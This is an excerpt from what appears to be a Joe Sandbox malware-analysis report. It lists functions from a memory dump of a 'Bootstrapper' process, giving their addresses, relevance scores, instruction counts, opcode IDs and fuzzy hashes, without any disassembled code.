                                                                                          • Opcode ID: 69b8c35601b55e7771492a1ecd60b44b6671fa35ba3337293b7171ece8a8e348
                                                                                          • Instruction ID: 3f53d36dfe28c9c2b110dcfcb4cfa815f2f6380b68e295cb0c66829dda68dabe
                                                                                          • Opcode Fuzzy Hash: 69b8c35601b55e7771492a1ecd60b44b6671fa35ba3337293b7171ece8a8e348
                                                                                          • Instruction Fuzzy Hash: FED12631B1C9594FEB89FA2C98466B437D1FF55B90F0401BAE44EC7297DE14EC828385
                                                                                          Function 00007FF848C34D78 Relevance: .4, Instructions: 434COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 49e76509bd0a1153462a7adcb28546296fa6876ca91875000e7d32a3ee56fe31
                                                                                          • Instruction ID: 4f0cf4df1a95ce7ccb179503012fe8b85fa7bfcf7080f6a8eab8eb000c6012c0
                                                                                          • Opcode Fuzzy Hash: 49e76509bd0a1153462a7adcb28546296fa6876ca91875000e7d32a3ee56fe31
                                                                                          • Instruction Fuzzy Hash: D5C10321A1DA8E4FE7D9EB2C94586787BD1FF59380F4900BBD40DC7293EE28AC468355
                                                                                          Function 00007FF848C461AC Relevance: .4, Instructions: 426COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a663cfc20394972863c0f8a97a7a17dbf5bf4a0ce0b608a4e972139c97ea011d
                                                                                          • Instruction ID: 5042ea205bbbf89abf71abcbe8c52839feae5af582de7bd772bc3d9102614a10
                                                                                          • Opcode Fuzzy Hash: a663cfc20394972863c0f8a97a7a17dbf5bf4a0ce0b608a4e972139c97ea011d
                                                                                          • Instruction Fuzzy Hash: B1C10730B1CA894FE7D5FB3C5469A793BD2FF89641B1500BAD08EC7297DE28AC428745
                                                                                          Function 00007FF848C34248 Relevance: .4, Instructions: 426COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6a85badcf8cb5e7cfafaa8ba0790a229dab4500a1f2c0eaee03094a2bc5e5377
                                                                                          • Instruction ID: 45ceb99652751262a1868d85be9596a156c2b672173d0612b9b41695af24ee57
                                                                                          • Opcode Fuzzy Hash: 6a85badcf8cb5e7cfafaa8ba0790a229dab4500a1f2c0eaee03094a2bc5e5377
                                                                                          • Instruction Fuzzy Hash: FFD1F321E0DA024EE7A9F72898912B977D1EF95B84F35457AC48FC31C2DF2978835389
                                                                                          Function 00007FF848C462F5 Relevance: .4, Instructions: 413COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 59a8de0981cd6c4d8db3f959467b4c8cc636753b8617cbe063ea1921ae4f81b9
                                                                                          • Instruction ID: b563e631ef3dd4dc68500bf9510b0e18b9e7795ff53d227f212f9c43b118efa4
                                                                                          • Opcode Fuzzy Hash: 59a8de0981cd6c4d8db3f959467b4c8cc636753b8617cbe063ea1921ae4f81b9
                                                                                          • Instruction Fuzzy Hash: 31C12620F1CA854FE799F73C546A6B83BD1EF49A80F1501BAD04DC7297DE28A8838745
                                                                                          Function 00007FF848C3F106 Relevance: .4, Instructions: 388COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a19a4b80e84d900c7f27bbc835bef87dec84427b05f23dbb28ef8012dbfa1602
                                                                                          • Instruction ID: 5a296738596e784c0eddb81a37f5ac62613099d29802f8da513364b6e6dd86f7
                                                                                          • Opcode Fuzzy Hash: a19a4b80e84d900c7f27bbc835bef87dec84427b05f23dbb28ef8012dbfa1602
                                                                                          • Instruction Fuzzy Hash: 51C19870A1CB498FE798FB2884596B6B7E2FF98340F04457ED48DC3296DF34A8429746
                                                                                          Function 00007FF848C385D5 Relevance: .4, Instructions: 374COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b3d6ea8b7e5263e38d08383cee5ee80988975d0ef53d14edd1bdb8f487c86464
                                                                                          • Instruction ID: 8b128acb54c9a9b8d9017f18a9a2e9cc7ce62c63f53e0e5ee877f6f6dffa4360
                                                                                          • Opcode Fuzzy Hash: b3d6ea8b7e5263e38d08383cee5ee80988975d0ef53d14edd1bdb8f487c86464
                                                                                          • Instruction Fuzzy Hash: 66A18E31B0CD0A4FEBE4EA1C9494AB473D2FF59360B1406FBD44DC72A6DA19DC829741
                                                                                          Function 00007FF848C369D0 Relevance: .3, Instructions: 339COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d3019cea5b9386b5f16ddcd4a56914950f0d83b68e2dc36d210190662b67b4ea
                                                                                          • Instruction ID: 83b40af81e1f9e6d203d5ec1a08a679fa05f24c527071aeab50a6f347ad06cc4
                                                                                          • Opcode Fuzzy Hash: d3019cea5b9386b5f16ddcd4a56914950f0d83b68e2dc36d210190662b67b4ea
                                                                                          • Instruction Fuzzy Hash: 53A1D831A1CA484FEB98EA5CA8456F977E1FF99750F04027EE44AC3162DB35F8828785
                                                                                          Function 00007FF848C3EC7F Relevance: .3, Instructions: 334COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8882bf38951351833cf8f4aaaeccdef468bf2db488932ff1377401e7c6f7db01
                                                                                          • Instruction ID: 96a0a350c67b1e0f2b1e9ec19a3152caebf3782b1169b26f7741523ae8de0eac
                                                                                          • Opcode Fuzzy Hash: 8882bf38951351833cf8f4aaaeccdef468bf2db488932ff1377401e7c6f7db01
                                                                                          • Instruction Fuzzy Hash: 31312B31E0DA898FE750F62CA8555E9B7D1FF95350F0802BBD089C35A2DF24A84AC756
                                                                                          Function 00007FF848C40390 Relevance: .3, Instructions: 319COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1005eb08c09f7f418518f61464e99dd964fdd3f0ee4f352ce2a0984bfc8061da
                                                                                          • Instruction ID: fd5be63f367c720e4b85a0884b5e9531cb340398070dae0fbd849532f909932d
                                                                                          • Opcode Fuzzy Hash: 1005eb08c09f7f418518f61464e99dd964fdd3f0ee4f352ce2a0984bfc8061da
                                                                                          • Instruction Fuzzy Hash: 74A10E31E0C98A9FDBC5FB6C94A56E97BE1FF59750F0401BAE049C7297CF28A8428744
                                                                                          Function 00007FF848C4B1C5 Relevance: .3, Instructions: 292COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 83423e3be4a407467ae98b344f633c47d87afeef4f8f6a230d22aa1db92131ee
                                                                                          • Instruction ID: fb68bffda1cf5dd04c2364482dd3c66264ffa245e51b14035d18b04774de1383
                                                                                          • Opcode Fuzzy Hash: 83423e3be4a407467ae98b344f633c47d87afeef4f8f6a230d22aa1db92131ee
                                                                                          • Instruction Fuzzy Hash: 2781593160DA494FE399EB689C4567077E0EF5A360F5802BED48DC71A3DA29F883C745
                                                                                          Function 00007FF848C35A60 Relevance: .3, Instructions: 267COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 28ffc98a4c6bac16349d460504ae1603ed91f34aba36936d2d3e85d545a5b944
                                                                                          • Instruction ID: 1e7a4aca2ebacececda12814f7e23d4f8a71a55d8ff372103aa0e26462346d33
                                                                                          • Opcode Fuzzy Hash: 28ffc98a4c6bac16349d460504ae1603ed91f34aba36936d2d3e85d545a5b944
                                                                                          • Instruction Fuzzy Hash: 6E812531D1DE869FE794F62C94553B6B7D1FF98390F0409BAD08EC3596CB28A8479342
                                                                                          Function 00007FF848C3D11F Relevance: .3, Instructions: 266COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d03b030b63083b0a08cf616f9440bc664a6f91d22077906b990716e3acca8fb2
                                                                                          • Instruction ID: e9358d210d9cf32bc1d5a505a6245c6c9ee8869f3a47c3f5b6fd37951daef3a0
                                                                                          • Opcode Fuzzy Hash: d03b030b63083b0a08cf616f9440bc664a6f91d22077906b990716e3acca8fb2
                                                                                          • Instruction Fuzzy Hash: 2D810722B0D5965EDB82F72CA0915F57BD2EF42365F0845BBD18DCB493CE09B84AC368
                                                                                          Function 00007FF848C40375 Relevance: .3, Instructions: 266COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2c488e84612693ca690ac9838c7f9444fb61570973e80725c544570018ac5f6c
                                                                                          • Instruction ID: f8e8d14ed87dc5672b04ee96e6b4b3d45d6466a5530333cf6415f661311a85ec
                                                                                          • Opcode Fuzzy Hash: 2c488e84612693ca690ac9838c7f9444fb61570973e80725c544570018ac5f6c
                                                                                          • Instruction Fuzzy Hash: 4581D131E0D98A9FDBC5FB6C94A56E97BE0FF59740F0401BAD048CB197DB24A842C748
                                                                                          Function 00007FF848C30B3C Relevance: .3, Instructions: 264COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f59a6027ab26f5d9b12a6498d607dcbfeaaa9a82cfc2b7aecea6ed526810ca47
                                                                                          • Instruction ID: ffc9ba120d3cf0eb2fd0b4ffa04cdbce419bb573cb18a995c38451cd4da357d9
                                                                                          • Opcode Fuzzy Hash: f59a6027ab26f5d9b12a6498d607dcbfeaaa9a82cfc2b7aecea6ed526810ca47
                                                                                          • Instruction Fuzzy Hash: F2918E31A0D5495FE795FBA884657FD7BA1EF89344F1400BED08AEB6D2CE296843C704
                                                                                          Function 00007FF848C36AA2 Relevance: .3, Instructions: 255COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f3e6417a83ed97ec7c3578c64e07cdd2b4e3aaaa7eb3456b95af80bae0b465fc
                                                                                          • Instruction ID: 9408c59243e2c7eb52e5fdde61814f2ac2c33efcc791e4ffb2c3c700309bba15
                                                                                          • Opcode Fuzzy Hash: f3e6417a83ed97ec7c3578c64e07cdd2b4e3aaaa7eb3456b95af80bae0b465fc
                                                                                          • Instruction Fuzzy Hash: D471D731A1CA5C8FDB59EB6CD8959B97BE1FF59701F04016FD48AD3251DE20E802DB82
                                                                                          Function 00007FF848C34218 Relevance: .2, Instructions: 244COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b00d5e2a2fc908dec0d2602d3e53b470502d2689085abd4f5e0c7a397bdb0721
                                                                                          • Instruction ID: 1bf515f287aaa0de6c7570b43eb82931240004288f0c69bfde201f491af23c1b
                                                                                          • Opcode Fuzzy Hash: b00d5e2a2fc908dec0d2602d3e53b470502d2689085abd4f5e0c7a397bdb0721
                                                                                          • Instruction Fuzzy Hash: 98712420A0C60A9FF7A8FA2854543B973D2EF45B90F14457EE68EC31C6DF2C68C68759
                                                                                          Function 00007FF848C49353 Relevance: .2, Instructions: 239COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0f7e3a42ccf430131cd8070ba6bed869a3e482d64bc8a82c4911a7677d06585a
                                                                                          • Instruction ID: e3ba46bb9cbfd63acd5f77424907129a3ed6e05f0e3a8a26982ff583f83ace70
                                                                                          • Opcode Fuzzy Hash: 0f7e3a42ccf430131cd8070ba6bed869a3e482d64bc8a82c4911a7677d06585a
                                                                                          • Instruction Fuzzy Hash: FA81A130A1CA598FDB99EF28C455BA877E1FF59744F0002BDE44DD72A2CB34A886CB45
                                                                                          Function 00007FF848C4938F Relevance: .2, Instructions: 229COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c97c572b42d42483058cc501eb58352a7b8976fda325f32f05f577bc436f0bc3
                                                                                          • Instruction ID: ea65903624365e8493b96330d377a7ae2dd3747c6c8d9c3f9e870dc7bb04b8e0
                                                                                          • Opcode Fuzzy Hash: c97c572b42d42483058cc501eb58352a7b8976fda325f32f05f577bc436f0bc3
                                                                                          • Instruction Fuzzy Hash: B3811830A1CA998FDB99EB28C855BA87BE1FF59744F0401BCD44DD72E2CB28E885C741
                                                                                          Function 00007FF848C34100 Relevance: .2, Instructions: 220COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 165310b2e433e7cd3064ddfa30c40eb80906afab65f6692b140fc0bd772fcf5d
                                                                                          • Instruction ID: f35d73d2dae5530d358d380a4542ff3d9ba80bedee0f7a216f342f12f23b9817
                                                                                          • Opcode Fuzzy Hash: 165310b2e433e7cd3064ddfa30c40eb80906afab65f6692b140fc0bd772fcf5d
                                                                                          • Instruction Fuzzy Hash: 0161563060CB458FD799EB28C8956B5B7E1EF95740F1045BED04B87292DF24F886C785
                                                                                          Function 00007FF848C3B380 Relevance: .2, Instructions: 215COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 33c80f3678e8d975e6e077b5983557778a9edae5e7aaf62b815d9041045028e4
                                                                                          • Instruction ID: 2fe1741f31b6ef229279c01a9340bea97305b0839dbf5d86da1fd19315d834de
                                                                                          • Opcode Fuzzy Hash: 33c80f3678e8d975e6e077b5983557778a9edae5e7aaf62b815d9041045028e4
                                                                                          • Instruction Fuzzy Hash: 5B515422F0DC5A8FE3E9E62C685827527D0EFA96A0F1401BBD04DC3296EE14DC079349
                                                                                          Function 00007FF848C37398 Relevance: .2, Instructions: 212COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1e4b66c7bdfff168aad3e774af7e5cf79e4368923edcb491344d2b361a0866ed
                                                                                          • Instruction ID: d63fada8e69541510dccf423c40f1aef85bbb5dd8c9b3fb3e94efdf410c2cf8d
                                                                                          • Opcode Fuzzy Hash: 1e4b66c7bdfff168aad3e774af7e5cf79e4368923edcb491344d2b361a0866ed
                                                                                          • Instruction Fuzzy Hash: 3A516621F0D99A4FE3E9E63C54592756BD1EF9AAA0B1401BBD08EC7293DE049C478345
                                                                                          Function 00007FF848C38AF0 Relevance: .2, Instructions: 211COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ca5f2d25a75bc28977266cc9afbd939a68f75fde13cc2296f6a299a30db1b006
                                                                                          • Instruction ID: 28f69cbbd9ee3d019013676715428d7aa3ba998c38239ee7f6c09c8573f25d31
                                                                                          • Opcode Fuzzy Hash: ca5f2d25a75bc28977266cc9afbd939a68f75fde13cc2296f6a299a30db1b006
                                                                                          • Instruction Fuzzy Hash: 5451043061CE0A4FD7A8EB1CD884A7173E0FF59395B14067ED44EC32A2DA25F8938785
                                                                                          Function 00007FF848C39A33 Relevance: .2, Instructions: 202COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4d31ec398f731c65b1a4f9bf15176f937eab024618638e2c0a9e3837195bfc1c
                                                                                          • Instruction ID: 1703ff7b7fd70bed397b7b0faf54d1d9d28d00f5d8b36ee3a7d4d0568c7bcfcf
                                                                                          • Opcode Fuzzy Hash: 4d31ec398f731c65b1a4f9bf15176f937eab024618638e2c0a9e3837195bfc1c
                                                                                          • Instruction Fuzzy Hash: 59714DB1D08A5A9FEB99EB1898997E8B3B1FF59740F5001FAD00DD3292CF345D829B04
                                                                                          Function 00007FF848C45D9A Relevance: .2, Instructions: 198COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f8c5f08f2fb9547547c3ec386f6ba33d5a614a129b284b39f2d5215618df0514
                                                                                          • Instruction ID: bdd38817bb376ce09e7eed7e4727413fa99fb2b6d2b3659bc9951ed4fe852fa0
                                                                                          • Opcode Fuzzy Hash: f8c5f08f2fb9547547c3ec386f6ba33d5a614a129b284b39f2d5215618df0514
                                                                                          • Instruction Fuzzy Hash: 7F51F831A0CB894FD796EB3898156B93FE1EF56660F0501FBD049C72A3DE29AC468781
                                                                                          Function 00007FF848C41451 Relevance: .2, Instructions: 197COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 113050e90679fdc5260cbea90750465b46ca2783efc24f16db35d09c4aa0f893
                                                                                          • Instruction ID: d92a64f19147327dea5595cd74539fc6f9cb12c7091454176e30e2b5977e2dd0
                                                                                          • Opcode Fuzzy Hash: 113050e90679fdc5260cbea90750465b46ca2783efc24f16db35d09c4aa0f893
                                                                                          • Instruction Fuzzy Hash: 1451D030A0C9594FDBD5EB2C88546B537D1EF95750F1401BAE88EC7297DE28EC82C784
                                                                                          Function 00007FF848C41BA9 Relevance: .2, Instructions: 193COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: aeba8e12b3683d01d6b9f99926b88b85fea37fd920ac58467e546d6092d45282
                                                                                          • Instruction ID: 75050aa4e3d1fd74740a20a325d79869e36d0bdef915320afa7c57ddb3eba9d8
                                                                                          • Opcode Fuzzy Hash: aeba8e12b3683d01d6b9f99926b88b85fea37fd920ac58467e546d6092d45282
                                                                                          • Instruction Fuzzy Hash: CF51E730B1CA994FDB95FB2C94556B93BD1EF58740F1401BBE48AC3297CE28EC41878A
                                                                                          Function 00007FF848C43B61 Relevance: .2, Instructions: 180COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9876988bb6e33b0f0188e5f04ccef75a8598acc993c0a4864c95b8ce99e0467d
                                                                                          • Instruction ID: a9c61dc52ac1d2a88affc3c5d9a34c7d21ceda94a635d41661745fc85762969a
                                                                                          • Opcode Fuzzy Hash: 9876988bb6e33b0f0188e5f04ccef75a8598acc993c0a4864c95b8ce99e0467d
                                                                                          • Instruction Fuzzy Hash: C7412722F1DDC64FE3D9E63C28696746BD0EF99A94F0901FAC488C72A7DA085C86C345
                                                                                          Function 00007FF848C412D0 Relevance: .2, Instructions: 170COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2853f5966e1afc118fc3a5e4a7251f24481bbd0dc8acddce4a8d604559533199
                                                                                          • Instruction ID: 2c31ba8af5a9d5b2008d5c76c91ae51ee21f91fb08af6903f52583b6c9176928
                                                                                          • Opcode Fuzzy Hash: 2853f5966e1afc118fc3a5e4a7251f24481bbd0dc8acddce4a8d604559533199
                                                                                          • Instruction Fuzzy Hash: A941D432E0CE2A8FEBE4EA6864552B937E0EF69B95F05017BD08DC3642DE14E8468745
                                                                                          Function 00007FF848C35A6D Relevance: .2, Instructions: 155COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b554b73f8967b160a4e0d8c788ec684d08446b77b524f9e5ed256309b21ea362
                                                                                          • Instruction ID: 1f3e4045c13bb6255d7c7d654e987517360772b3ad54616bf991aaabf4b76f83
                                                                                          • Opcode Fuzzy Hash: b554b73f8967b160a4e0d8c788ec684d08446b77b524f9e5ed256309b21ea362
